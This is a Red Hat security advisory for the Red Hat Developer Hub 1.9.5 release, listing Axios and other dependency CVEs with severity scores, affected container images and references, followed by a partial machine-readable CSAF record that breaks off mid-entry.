Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44488

A flaw was found in Axios, a promise-based HTTP client. When using the fetch adapter, Axios did not properly enforce configured request and response size limits. This vulnerability allows a remote attacker, through a malicious or compromised server, or by supplying a large data URL, to send or receive oversized data bodies. This can lead to resource exhaustion in server-side applications, resulting in a Denial of Service (DoS).

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44492

A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not properly normalize IPv4-mapped IPv6 addresses. When a NO_PROXY setting is configured to block direct access to specific IPv4 addresses, an attacker can bypass this restriction by using the IPv4-mapped IPv6 form of the address in a request URL. This allows the request to be routed through the proxy, potentially exposing internal services or sensitive information that should otherwise be inaccessible.

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CWE-289 - Authentication Bypass by Alternate Name

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44494

A flaw was found in Axios. This vulnerability, a Prototype Pollution "Gadget" attack, allows an attacker to escalate any existing Object.prototype pollution in an application's dependency tree into a full Man-in-the-Middle (MITM) attack. This enables the attacker to intercept, read, and modify all HTTP traffic, including sensitive authentication credentials. The flaw occurs because the `config.proxy` setting is susceptible to prototype pollution, allowing an attacker to inject a malicious proxy server.

8.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44495

A flaw was found in Axios, a promise-based HTTP client. This vulnerability involves prototype pollution gadgets in the request configuration processing. If another vulnerability has already polluted the Object.prototype.transformResponse, affected Axios versions may incorrectly interpret this inherited value as part of the request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request.

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

CVE-2026-44496

A flaw was found in Axios. A remote attacker, by influencing the XSRF cookie name in a browser environment, could cause the application to construct a regular expression that leads to excessive processing. This can result in a client-side Denial of Service (DoS), where the affected browser tab may freeze, impacting the availability of the application for the user.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64		—	Workaround

Threats

Impact Important

References

182 references

URL	Category
https://access.redhat.com/errata/RHSA-2026:26234	self
https://access.redhat.com/security/cve/CVE-2026-24781	external
https://access.redhat.com/security/cve/CVE-2026-32281	external
https://access.redhat.com/security/cve/CVE-2026-41242	external
https://access.redhat.com/security/cve/CVE-2026-41672	external
https://access.redhat.com/security/cve/CVE-2026-41673	external
https://access.redhat.com/security/cve/CVE-2026-41674	external
https://access.redhat.com/security/cve/CVE-2026-41675	external
https://access.redhat.com/security/cve/CVE-2026-42033	external
https://access.redhat.com/security/cve/CVE-2026-42035	external
https://access.redhat.com/security/cve/CVE-2026-42039	external
https://access.redhat.com/security/cve/CVE-2026-42041	external
https://access.redhat.com/security/cve/CVE-2026-42043	external
https://access.redhat.com/security/cve/CVE-2026-42044	external
https://access.redhat.com/security/cve/CVE-2026-44293	external
https://access.redhat.com/security/cve/CVE-2026-44486	external
https://access.redhat.com/security/cve/CVE-2026-44487	external
https://access.redhat.com/security/cve/CVE-2026-44488	external
https://access.redhat.com/security/cve/CVE-2026-44492	external
https://access.redhat.com/security/cve/CVE-2026-44494	external
https://access.redhat.com/security/cve/CVE-2026-44495	external
https://access.redhat.com/security/cve/CVE-2026-44496	external
https://access.redhat.com/security/cve/CVE-2026-6321	external
https://access.redhat.com/security/cve/CVE-2026-6322	external
https://access.redhat.com/security/cve/CVE-2026-9277	external
https://access.redhat.com/security/updates/classi…	external
https://catalog.redhat.com/search?gs&searchType=c…	external
https://developers.redhat.com/rhdh/overview	external
https://docs.redhat.com/en/documentation/red_hat_…	external
https://issues.redhat.com/browse/RHDHBUGS-3128	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2026-6321	self
https://bugzilla.redhat.com/show_bug.cgi?id=2466582	external
https://www.cve.org/CVERecord?id=CVE-2026-6321	external
https://nvd.nist.gov/vuln/detail/CVE-2026-6321	external
https://cna.openjsf.org/security-advisories.html	external
https://github.com/fastify/fast-uri/security/advi…	external
https://access.redhat.com/security/cve/CVE-2026-6322	self
https://bugzilla.redhat.com/show_bug.cgi?id=2466684	external
https://www.cve.org/CVERecord?id=CVE-2026-6322	external
https://nvd.nist.gov/vuln/detail/CVE-2026-6322	external
https://github.com/fastify/fast-uri/security/advi…	external
https://access.redhat.com/security/cve/CVE-2026-9277	self
https://bugzilla.redhat.com/show_bug.cgi?id=2480741	external
https://www.cve.org/CVERecord?id=CVE-2026-9277	external
https://nvd.nist.gov/vuln/detail/CVE-2026-9277	external
https://github.com/ljharb/shell-quote	external
https://github.com/ljharb/shell-quote/commit/1518179	external
https://github.com/ljharb/shell-quote/security/ad…	external
https://www.npmjs.com/package/shell-quote	external
https://access.redhat.com/security/cve/CVE-2026-24781	self
https://bugzilla.redhat.com/show_bug.cgi?id=2466531	external
https://www.cve.org/CVERecord?id=CVE-2026-24781	external
https://nvd.nist.gov/vuln/detail/CVE-2026-24781	external
https://github.com/patriksimek/vm2/commit/8d30d93…	external
https://github.com/patriksimek/vm2/commit/bdd3d15…	external
https://github.com/patriksimek/vm2/commit/fd266d0…	external
https://github.com/patriksimek/vm2/releases/tag/v3.11.0	external
https://github.com/patriksimek/vm2/security/advis…	external
https://access.redhat.com/security/cve/CVE-2026-32281	self
https://bugzilla.redhat.com/show_bug.cgi?id=2456333	external
https://www.cve.org/CVERecord?id=CVE-2026-32281	external
https://nvd.nist.gov/vuln/detail/CVE-2026-32281	external
https://go.dev/cl/758061	external
https://go.dev/issue/78281	external
https://groups.google.com/g/golang-announce/c/0uY…	external
https://pkg.go.dev/vuln/GO-2026-4946	external
https://access.redhat.com/security/cve/CVE-2026-41242	self
https://bugzilla.redhat.com/show_bug.cgi?id=2459442	external
https://www.cve.org/CVERecord?id=CVE-2026-41242	external
https://nvd.nist.gov/vuln/detail/CVE-2026-41242	external
https://github.com/protobufjs/protobuf.js/commit/…	external
https://github.com/protobufjs/protobuf.js/commit/…	external
https://github.com/protobufjs/protobuf.js/release…	external
https://github.com/protobufjs/protobuf.js/release…	external
https://github.com/protobufjs/protobuf.js/securit…	external
https://access.redhat.com/security/cve/CVE-2026-41672	self
https://bugzilla.redhat.com/show_bug.cgi?id=2467631	external
https://www.cve.org/CVERecord?id=CVE-2026-41672	external
https://nvd.nist.gov/vuln/detail/CVE-2026-41672	external
https://github.com/xmldom/xmldom/commit/b39754088…	external
https://github.com/xmldom/xmldom/commit/fda7cc313…	external
https://github.com/xmldom/xmldom/pull/987	external
https://github.com/xmldom/xmldom/releases/tag/0.8.13	external
https://github.com/xmldom/xmldom/releases/tag/0.9.10	external
https://github.com/xmldom/xmldom/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-41673	self
https://bugzilla.redhat.com/show_bug.cgi?id=2467630	external
https://www.cve.org/CVERecord?id=CVE-2026-41673	external
https://nvd.nist.gov/vuln/detail/CVE-2026-41673	external
https://github.com/xmldom/xmldom/commit/17678a2a7…	external
https://github.com/xmldom/xmldom/commit/291257493…	external
https://github.com/xmldom/xmldom/commit/2d6d6916e…	external
https://github.com/xmldom/xmldom/commit/430357c7b…	external
https://github.com/xmldom/xmldom/commit/4845ef109…	external
https://github.com/xmldom/xmldom/commit/8834218c8…	external
https://github.com/xmldom/xmldom/commit/8b7cfd149…	external
https://github.com/xmldom/xmldom/commit/b0620383a…	external
https://github.com/xmldom/xmldom/commit/e6edcab6b…	external
https://github.com/xmldom/xmldom/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-41674	self
https://bugzilla.redhat.com/show_bug.cgi?id=2467620	external
https://www.cve.org/CVERecord?id=CVE-2026-41674	external
https://nvd.nist.gov/vuln/detail/CVE-2026-41674	external
https://github.com/xmldom/xmldom/commit/372008f9a…	external
https://github.com/xmldom/xmldom/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-41675	self
https://bugzilla.redhat.com/show_bug.cgi?id=2467629	external
https://www.cve.org/CVERecord?id=CVE-2026-41675	external
https://nvd.nist.gov/vuln/detail/CVE-2026-41675	external
https://github.com/xmldom/xmldom/commit/7207a4b0e…	external
https://github.com/xmldom/xmldom/security/advisor…	external
https://access.redhat.com/security/cve/CVE-2026-42033	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461607	external
https://www.cve.org/CVERecord?id=CVE-2026-42033	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42033	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42035	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461606	external
https://www.cve.org/CVERecord?id=CVE-2026-42035	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42035	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42039	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461630	external
https://www.cve.org/CVERecord?id=CVE-2026-42039	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42039	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42041	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461629	external
https://www.cve.org/CVERecord?id=CVE-2026-42041	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42041	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42043	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461626	external
https://www.cve.org/CVERecord?id=CVE-2026-42043	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42043	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42044	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461624	external
https://www.cve.org/CVERecord?id=CVE-2026-42044	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42044	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44293	self
https://bugzilla.redhat.com/show_bug.cgi?id=2477104	external
https://www.cve.org/CVERecord?id=CVE-2026-44293	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44293	external
https://github.com/protobufjs/protobuf.js/securit…	external
https://access.redhat.com/security/cve/CVE-2026-44486	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487947	external
https://www.cve.org/CVERecord?id=CVE-2026-44486	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44486	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44487	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487948	external
https://www.cve.org/CVERecord?id=CVE-2026-44487	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44487	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44488	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487949	external
https://www.cve.org/CVERecord?id=CVE-2026-44488	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44488	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44492	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487938	external
https://www.cve.org/CVERecord?id=CVE-2026-44492	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44492	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44494	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487942	external
https://www.cve.org/CVERecord?id=CVE-2026-44494	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44494	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44495	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487937	external
https://www.cve.org/CVERecord?id=CVE-2026-44495	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44495	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-44496	self
https://bugzilla.redhat.com/show_bug.cgi?id=2487943	external
https://www.cve.org/CVERecord?id=CVE-2026-44496	external
https://nvd.nist.gov/vuln/detail/CVE-2026-44496	external
https://github.com/axios/axios/security/advisorie…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Developer Hub 1.9.5 has been released.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:26234",
        "url": "https://access.redhat.com/errata/RHSA-2026:26234"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-24781",
        "url": "https://access.redhat.com/security/cve/CVE-2026-24781"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32281",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-41242",
        "url": "https://access.redhat.com/security/cve/CVE-2026-41242"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-41672",
        "url": "https://access.redhat.com/security/cve/CVE-2026-41672"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-41673",
        "url": "https://access.redhat.com/security/cve/CVE-2026-41673"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-41674",
        "url": "https://access.redhat.com/security/cve/CVE-2026-41674"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-41675",
        "url": "https://access.redhat.com/security/cve/CVE-2026-41675"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44293",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44293"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44486",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44486"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44487",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44487"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44488",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44488"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44492",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44492"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44494",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44494"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44495",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44495"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-44496",
        "url": "https://access.redhat.com/security/cve/CVE-2026-44496"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-6321",
        "url": "https://access.redhat.com/security/cve/CVE-2026-6321"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-6322",
        "url": "https://access.redhat.com/security/cve/CVE-2026-6322"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-9277",
        "url": "https://access.redhat.com/security/cve/CVE-2026-9277"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "external",
        "summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
        "url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
      },
      {
        "category": "external",
        "summary": "https://developers.redhat.com/rhdh/overview",
        "url": "https://developers.redhat.com/rhdh/overview"
      },
      {
        "category": "external",
        "summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
        "url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHDHBUGS-3128",
        "url": "https://issues.redhat.com/browse/RHDHBUGS-3128"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_26234.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Developer Hub 1.9.5 release.",
    "tracking": {
      "current_release_date": "2026-06-17T15:37:54+00:00",
      "generator": {
        "date": "2026-06-17T15:37:54+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.0.0"
        }
      },
      "id": "RHSA-2026:26234",
      "initial_release_date": "2026-06-16T09:33:13+00:00",
      "revision_history": [
        {
          "date": "2026-06-16T09:33:13+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-06-16T14:24:48+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-17T15:37:54+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Developer Hub 1.9",
                "product": {
                  "name": "Red Hat Developer Hub 1.9",
                  "product_id": "Red Hat Developer Hub 1.9",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:rhdh:1.9::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Developer Hub"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-hub-rhel9@sha256%3Adca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-hub-rhel9\u0026tag=1781187342"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-rhel9-operator\u0026tag=1781187028"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
                "product": {
                  "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
                  "product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/rhdh-operator-bundle@sha256%3Adac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-operator-bundle\u0026tag=1781191254"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64 as a component of Red Hat Developer Hub 1.9",
          "product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        },
        "product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64",
        "relates_to_product_reference": "Red Hat Developer Hub 1.9"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-6321",
      "cwe": {
        "id": "CWE-22",
        "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
      },
      "discovery_date": "2026-05-04T20:01:14.938426+00:00",
      "flags": [
        {
